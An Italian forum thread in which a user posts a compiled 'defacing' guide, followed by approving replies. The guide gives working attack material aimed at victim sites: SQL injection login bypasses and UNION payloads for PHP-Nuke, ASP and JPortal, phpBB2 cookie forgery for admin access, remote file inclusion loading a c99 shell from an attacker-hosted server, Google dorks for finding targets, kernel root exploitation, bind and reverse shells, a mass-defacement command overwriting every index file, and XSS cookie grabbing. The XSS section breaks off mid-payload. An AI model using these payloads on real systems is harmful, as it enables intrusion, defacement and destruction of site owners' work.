• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Release Elenco Bugs CMS

gabrielemagico

Utente Normale
Autore del topic
8 Febbraio 2011
99
0
Miglior risposta
0
font.php

Elenco bugs CMS 12 Ore Per Scivere Questo Romanzo xD :emoji_relieved:

questi bug sono tutte guide messe insieme qundo studiavo ancora queste cose cmq non si sa mai (puoddarsi che l'ho presa pure di qui)
start
Il termine Defacing vuol dire hackerare un sito, cioè cambiare l’Home Page o più pagine infatti bisogna distinguere due tipi di Deface:

* Deface: Deface normale con il solo cambio di index (Pagina iniziale)
* Mass Deface: Cancellazione o Modificazione di tutti i file dell’FTP

Ci sono varie tecniche per il Defacing, noi ne esamineremo 8: Remote File Inclusion, SQL Injection, ASP Injection, XSS (Cross Site Scripting), Remote Command Injection, Cookie Manipulation, Google Hacking e gli Exploit.

In questa guida parleremo di questi attacchi per 10 tipi di Siti:

1. PHP Site
2. PHP-Nuke Site
3. ASP Site
4. HTML Site
5. PHPBB
6. PHPBB2 Forum
7. JPortal
8. GuestBook
9. Invision PowerBoard
10. Powered by SalvoCms

Ma ecco in dettaglio le varie mini-guide:

* PHP Site

Per defacciare un sito in PHP potete usare un Remote File Inclusion e siete dentro. Per fare ciò basta scrivere:
Perfavore, Entra oppure Registrati per vedere i Link!

Perfavore, Entra oppure Registrati per vedere i Link!
(tutto attaccato).
Dove al posto di
Perfavore, Entra oppure Registrati per vedere i Link!
ci mettete il vostro sito naturalmente con la c99 (Shell) dentro, che va messa usando l’FTP.

Oppure si può usare la tecnica SQL Injection, scrivendo nel login:

UserName: ‘or’’=’
Password: ‘or’’=’

Se invece il sito è patchato provvediamo con dei Bug. Proviamo scrivendo nel sito vittima un percorso ke potrebbe portarci all’intera lista di password:
Perfavore, Entra oppure Registrati per vedere i Link!


Se vi vedete spuntare qualcosa allora avrete d’avanti la lista di password in MD5 (un sistema di crittografia per le pass in rete). Per decifrarle salvate tutto in un txt e chiudete la connessione. Andate su un sito per pass MD5 (vedere in fondo alla guida) o usate un programma come “Cain & Abel” (un potentissimo BruteForcer per pass in md5). Se la stringa non ci porta da nessuna parte scriviamo:
Perfavore, Entra oppure Registrati per vedere i Link!

/passwd (tutto attaccato)
Se non trovate niente pure questa volta si vede che l’Admin è un pò furbo quindi non vi resta che provare l’ultima alternativa. Andate nel percorso
Perfavore, Entra oppure Registrati per vedere i Link!

/passwd (tutto attaccato)
Dove al posto di /mlog.html? è stato scritto /mylog.html?. Se non funziona neanche questo lasciate perdere oppure smanettate un pò .

* PHP-Nuke Site

Ora vi illustro 3 exploit moderni e funzionanti;

Exploit – Modulo Cerca

Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.

Exploit – Top10

Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit:
Perfavore, Entra oppure Registrati per vedere i Link!

%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.

Exploit – Sql Injection

Scriviamo nella barra degli indirizzi la stringa:
Perfavore, Entra oppure Registrati per vedere i Link!

Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro.

Con la stringa
Perfavore, Entra oppure Registrati per vedere i Link!
si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass

* ASP Site

In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root

Diventare Utenti senza Neanche registrarsi:

UserName: apostrofo
Password: [nessuna password, lasciate vuoto]

Accedere da Admin:

UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’—
Password: [nessuna password]

Diventare automaticamente amministratori

UserName: admin’ –
Password: [nessuna pass]

Primo utente nella lista

UserName: ‘ or 0=0 –sp_password
Password: [nessuna pass]

* HTML Site

L’HTML sappiate che, a differenza dei siti in PHP e ASP (che sono linguaggi dinamici), è un linguaggio statico (si chiama anche linguaggio di Markup) o quindi non può essere Hackerato o quasi.
L’unico modo per hackerare un sito in html sarebbe quello di trovare qualche Bug nell’FTP o nel Finger. Oltre a questi attacchi possono essere vulnerabili a XSS.

* PHPBB & PHPBB2 Forum

Esistono molti exploit per i forum in PHPBB & PHPBB2, ma sono exploit da compilare in C e da includere nel sito. Quindi per defacciare utilizzando degli exploit bisogna sapere il Linguaggio C. Esiste comunque un bel exploit che ci permette di diventare Root in un forum, l’unica pecca è che dobbiamo usare Firefox. La tecnica che andremo ad utilizzare è Cookie Manipulation. Innanzitutto cancelliamo tutti i Cookie. Entriamo nel sito in PHPBB2 e usciamo. Adesso utliziamo l’Add-On Extended Cookie Manager 0.8.1 o View Cookies CS 1.0.7 (che ci permettono di modificare i cookie) e apriamo il cookie ke ci ha mandato il forum (l’unico che c’è perchè li abbiamo cancellati tutti prima).

Se avremo una scritta del genere 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%¬7B%¬7D. Sostituiamola con questa: 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%¬7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%¬7D (tutto attaccato).
Salvate tutto e torniamo al forum. Adesso saremo admin.
PS: Smanettando un pò con i cookie potete accedere in Root in molti siti.

* JPortal

Per hackerare un sito in JPortal basta Injettare all’URL un codice (SQL Injection) e poi fare il Login:

Perfavore, Entra oppure Registrati per vedere i Link!

0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,i d%20
from%20admins%20LIMIT%201 (tutto attaccato)
qst scritta da me
1.1: Il Bug Wink
2: La shell in PHP
2.2: Entriamo in Azione Wink
3: Ottenere i privilegi di root
4: Sovrascrivere tutti gli index di tutti i siti ospitati in un unico server

2.0 -- Remote File Inclusion e phpNuke:

Ci sono tanti tipi di vulnerabilità , quella che serve a noi ora e' il Remote File Inclusion. Che e' ? Semplice, consiste nel far eseguire ad un server uno script PHP hostato su un altro server.
Come esempio useremo un bug del modulo My_eGallery di phpNuke, per trovare i siti vulnerabili c'e' il nostro miglior amico dopo il Pinguino, Google.
Fate una semplice ricerca con "allinurl:my_eGallery" come parola chiave, e vedrete tutti i siti indicizzati da google che usano questo modulo.

2.1 -- Il Bug

Il bug che sfrutteremo risiede nelle versioni del modulo My_eGallery precedenti alla 3.1.1 g.

Perfavore, Entra oppure Registrati per vedere i Link!


Che significa ? inviando un URL come questo dal nostro browser faremo eseguire lo script shell.jpg , che e' in un altro host (
Perfavore, Entra oppure Registrati per vedere i Link!
) , sul server vittima.
Ma se volevamo una shell in PHP perche' e' .jpg ???
Se fosse shell.php , lo script verrebbe interpretato sul server che lo hosta, e noi invece vogliamo che sia interpretato (eseguito...) sul server vittima.

2.2 -- La Shell in PHP:

Cos'e' una shell spero lo sappiate, la cosa bella e' che si possono creare degli script in php che ci permettono di eseguiri comandi da remoto, attraverso il nostro browser web (IE sucks ! Firefox Rulez :
Perfavore, Entra oppure Registrati per vedere i Link!
) come se avessimo accesso diretto al server.La migliore shell in PHP , a mio avviso e' la c99 shell del Captain Crunch Team,
ha un sacco di opzioni, e pure il tasto "Mass Deface" per i piu' imbranati...
Quindi recuperatela, se non sapete dove trovarla (Google Rulez) guardate in fondo alla pagina nella sezione link...

2.3 -- Incominciamo sul serio

Supponiamo che abbiate scoperto con google che il sito vittima.it abbia installato my_eGallery , e che la vostra shell sia su sitocattivo.com/shell,jpg
Con il nostro browser . ben proxati, colleghiamoci all'url:

Perfavore, Entra oppure Registrati per vedere i Link!


Se vi beccate un messaggio tipo "Were you trying to hack our site or server ??? Go Away Bastard" evidentemente non si puo' fare niente...
Se al contrario vediamo la rassicurante scritta "! c99 Shell !" allora possiamo essere un po' contenti Wink
Nella parte alta della shell, vedrete un bel po' di informazioni sul pc che funge da server, come OS , ip , versione del web server e altro..

----------------------------------------------------------------------------------
Software: Apache/1.3.6 (Unix) (Red Hat/Linux) PHP/4.3.1
uname -a: Linux sito.host.it 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Safe-mode: OFF (not secure)
Directory: /www/sito.com/ rwxrwxrwx
Free 2.83 GB of 13.27 GB (21.3%)
---------------------------------------------------------------------------------------

Queste informazioni, si ottengono sui server Linux con il comando "uname -a" ,
se vedete che non siamo su un server Linux per ora lasciamo stare...
Tra queste info, vedrete la versione del Kernel, il "cuore" di linux, che pero' , purtroppo e per fortuna e' pieno di bug che ci permetteranno , da user pezzente (nobody) senza privilegi, di diventare root , ovvero il dio del sistema Wink
Per questo esempio porremo che il server abbia come SO Linux con kernel 2.2.5-15.
Ora ci faremo un giretto nel server...
Continuate a risalire le directory, finche' , se tutto va bene, arriverete alla cartella /www/ , contente una serie di sottocartelle , con ciascuna il nome di un sito internet.
Per evitare che in maniera così semplice si possano defacciare tutti i siti ospitati e avere il completo controllo del server, esistono i diversi user, ciascuno con i loro privilegi, Noi ora siamo "nobody" (potete controllare con il comando "whoami") , e abbiamo accesso solo alle cartelle con chmod 777 , ovvero quelle scrivibili da tutti, in generale sono cartelle settate in questo modo per permettere l'upload i immagini o file.
Cerchiamo una cartella nella quale abbiamo pieno accesso, nella C99 sono evidenziate in verde.

3 -- Roooooooooooooooooooooooot

E come facciamo a diventare root ??
Exploitiamo il kernel Wink
L'exploit che ci serve e' quello del "kmod" , si trova anche troppo facilmente da google, scarichiamolo, uppiamolo sul server con la funzione upload della C99, e compiliamolo, gcc kmod.c - kmod ....
Chmoddiamolo a 777 per ottenere il permesso di eseguirlo e siamo a posto Wink
Ora usiamo la funzione "bind" di C99 , che ci crea una shell sul server a cui possiamo accedere da remoto con Netcat o Telnet.
Settiamola sulla porta che preferiamo , e facciamo bind, se il server non e' protetto da firewall dovrebbe essere a posto, se no provate la reverse shell altrimenti si parlerà piu' avanti di come fregare sti firewall Smile
Connettiamo alla nostra shell, e facciamo un "id" come risposta dovremmo ottenere:

--------------------------------------------------------
uid=99(nobody) gid=99(nobody) groups=99(nobody)
--------------------------------------------------------

che ci conferma l'inutilità del nostro user...
Ora eseguiamo l'exploit con ./kmod , rifacciamo "id" e se tutto va come previsto:

----------------------------------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
----------------------------------------------------------------------------------------

ed ora possiamo tutto Wink

4 -- Ed ora la parte cattiva...

E quì si differenziano le persone, c'e' chi sovrascrive tutti gli index.html e defaccia le home, chi cerca un file inutile e lo sovrascrive per segnalare la sua presenza senza fare danni, e chi lascia semplicemente un file in /root per avvisare l'admin...
visto che creare un file in /root e scriverci dentro, penso lo sappiate fare (o almeno spero...) vediamo come defacciare le home Wink
In questo caso ci torna comodo il comando "find" di Linux:

---------------------------------------------------------
find / -name "index.*" -exec cp nostroindex.html {} \;
---------------------------------------------------------

Che fa questo comando ?? dice al nostro pinguino di cercare tutti i file "index.html" , quindi .php, .shtml, .e così via a partire dalla directory / e in tutte le sue subdirectory, quando lo ha trovato, lo sovrascrive con il nostro file "nostroindex.html" che deve essere nella stessa directory dalla quale eseguiamo il comando.
Finito! Siete contenti ? Siete riusciti in poco tempo a fare un bel casino, personalmente non mi piace defacciare le home, piuttosto che sentirmi 50 webmaster tirarmi addosso i cristoni per aver rovinato il loro lavoro, preferisco lasciare un messaggio e sentire poi i webmaster stessi che ringraziano per aver evitato loro guai peggiori.. Per maggiori info visitate il sito o mandatemi una mail, non fate troppi danni...

xss
QUESTA GUIDA è A PURO SCOPO INFORMATIVO. IL SUDDETTO SITO NON ASSUME NESSUNA RESPONSABILITà SULL'USO DELLA GUIDA.QUALSIASI USO IMPROPRIO IL SOTTOSTRITTO NON è RESPONSABILE DEI DANNI.
il cross site scripting o meglio l'xss e una delle vulnerabilità piu presenti nella maggior parte dei siti web.
l'xss consiste nell'inserimento di codice java script in determinati moduli...

un esempio di codice js è:


CODICE
<script>alert('xss')</script>

chiaramente tutti saprete che qst codice nn fa altro ke aprire un alert cn al suo interno un messaggio in qst caso il mess e "xss"

L'xss è una vulnerabilità che affligge le applicazioni web che controllano male le variabili input.ovviamente un attacco xss nn consiste solo nel far aprire l'alert ma sfruttare un xss e ben altro...

ora spieghiamo come funziona un xss che grabba...

x prima cosa dobbiamo trovare un sito vulnerabile...

x trovare siti vulnerabili possiamo utilizzare dork tipo:

inurl:"index.php/page="

prendiamo come esempio:

Perfavore, Entra oppure Registrati per vedere i Link!


dopo l'= andremo ad inserire la nosta xss...


CODICE
www.esempio.it/index.php/page=<script>alert('xss')</script>


se appare l'alert il sito e vulnerabile ora pero dobbiamo constatare se la nostra xss grabba...x far cio faremo in qst modo:


CODICE
www.esempio.it/index.php/page=<script>alert(document Neache 12 Ore Se Devo Essere Sincero Alla Prossima Guida!
 
Ultima modifica:
Riferimento: Elenco Bugs CMS

Bella guida per i meno esperti mi hai veramente stupito :emoji_smiley: mi servirà!
 
Riferimento: Elenco Bugs CMS

Bravo, ma ti conviene non scrivere se volete copiarla fate, comunque bravo lo stesso, mi servivano.
 
Riferimento: Elenco Bugs CMS

Ti consiglio di formattare un pò il testo metti tutto al centro con un bello sfondo nero e sopra ci metti un verde chiaro.
Così renderai il thread, molto più leggibile e piacevole a leggerlo e ordinato.
:bye:​
 
Riferimento: Elenco Bugs CMS

Scusami una cosa cosa centra con i CMS questa guida?? Poi metti la fonte!
 
Riferimento: Elenco Bugs CMS

Di sicuro avrà sbagliato pero ottima guida! :emoji_slight_smile: e poi la fonte non la può mettere xk e stato bannato mi pare logico!